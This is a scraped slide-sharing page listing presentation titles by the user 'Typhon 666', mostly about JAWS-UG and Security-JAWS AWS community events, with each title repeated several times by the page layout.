20211120 JAWS PANKRATION 2021 OPENING REMARKSTyphon 666
 
20211111 Security-JAWS Introduction
20211111 Security-JAWS Introduction20211111 Security-JAWS Introduction
20211111 Security-JAWS IntroductionTyphon 666
 
20210712 X-Tech JAWS Main
20210712 X-Tech JAWS Main20210712 X-Tech JAWS Main
20210712 X-Tech JAWS MainTyphon 666
 
20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...
20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...
20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...Typhon 666
 
20210427_Introducing_X-TechJAWS
20210427_Introducing_X-TechJAWS20210427_Introducing_X-TechJAWS
20210427_Introducing_X-TechJAWSTyphon 666
 
20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in Tokyo
20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in Tokyo20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in Tokyo
20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in TokyoTyphon 666
 

Mehr von Typhon 666 (20)

20240214 Security-JAWS activity results for 2023 and activity goals for 2024
20240214 Security-JAWS activity results for 2023 and activity goals for 202420240214 Security-JAWS activity results for 2023 and activity goals for 2024
20240214 Security-JAWS activity results for 2023 and activity goals for 2024
 
20240207 Comparison of AWS Security Hub and 3rd party CSPM, consideration of...
20240207 Comparison of  AWS Security Hub and 3rd party CSPM, consideration of...20240207 Comparison of  AWS Security Hub and 3rd party CSPM, consideration of...
20240207 Comparison of AWS Security Hub and 3rd party CSPM, consideration of...
 
20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~
20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~
20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~
 
20230718 Community support and awards from AWS are full of benefits
20230718 Community support and awards from AWS are full of benefits20230718 Community support and awards from AWS are full of benefits
20230718 Community support and awards from AWS are full of benefits
 
20230518_The results of the digital business card Prairie Card unveiled at th...
20230518_The results of the digital business card Prairie Card unveiled at th...20230518_The results of the digital business card Prairie Card unveiled at th...
20230518_The results of the digital business card Prairie Card unveiled at th...
 
Continuous Community Management and Output ~What We Cherished, Successes, and...
Continuous Community Management and Output ~What We Cherished, Successes, and...Continuous Community Management and Output ~What We Cherished, Successes, and...
Continuous Community Management and Output ~What We Cherished, Successes, and...
 
継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...
継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...
継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...
 
Security-JAWS activity results for 2022 and activity goals for 2023
Security-JAWS activity results for 2022 and activity goals for 2023Security-JAWS activity results for 2022 and activity goals for 2023
Security-JAWS activity results for 2022 and activity goals for 2023
 
20221222 Looking back at my JAWS-UG output in 2022
20221222 Looking back at my JAWS-UG output in 202220221222 Looking back at my JAWS-UG output in 2022
20221222 Looking back at my JAWS-UG output in 2022
 
Introduction_of_CNSec_three_dogs _AWS_Dev_Day_LT
Introduction_of_CNSec_three_dogs _AWS_Dev_Day_LTIntroduction_of_CNSec_three_dogs _AWS_Dev_Day_LT
Introduction_of_CNSec_three_dogs _AWS_Dev_Day_LT
 
Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...
Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...
Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...
 
20220121 JAWS PANKRATION 2021 re:Trospective
20220121 JAWS PANKRATION 2021 re:Trospective20220121 JAWS PANKRATION 2021 re:Trospective
20220121 JAWS PANKRATION 2021 re:Trospective
 
20211223 Intellectual Constipation, To the World!
20211223 Intellectual Constipation, To the World!20211223 Intellectual Constipation, To the World!
20211223 Intellectual Constipation, To the World!
 
20211121 JAWS PANKRATION 2021 CLOSING REMARKS
20211121 JAWS PANKRATION 2021 CLOSING REMARKS20211121 JAWS PANKRATION 2021 CLOSING REMARKS
20211121 JAWS PANKRATION 2021 CLOSING REMARKS
 
20211120 JAWS PANKRATION 2021 OPENING REMARKS
20211120 JAWS PANKRATION 2021 OPENING REMARKS20211120 JAWS PANKRATION 2021 OPENING REMARKS
20211120 JAWS PANKRATION 2021 OPENING REMARKS
 
20211111 Security-JAWS Introduction
20211111 Security-JAWS Introduction20211111 Security-JAWS Introduction
20211111 Security-JAWS Introduction
 
20210712 X-Tech JAWS Main
20210712 X-Tech JAWS Main20210712 X-Tech JAWS Main
20210712 X-Tech JAWS Main
 
20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...
20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...
20210624 Monitoring the AWS Observability Workshop Environment with Datadog O...
 
20210427_Introducing_X-TechJAWS
20210427_Introducing_X-TechJAWS20210427_Introducing_X-TechJAWS
20210427_Introducing_X-TechJAWS
 
20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in Tokyo
20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in Tokyo20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in Tokyo
20210415 A Story about Eating a Salmon Shark Meat in a Kitchen Car in Tokyo
 

20191013_Wolf and Seven Little Goats -Serverless Fairy Tales-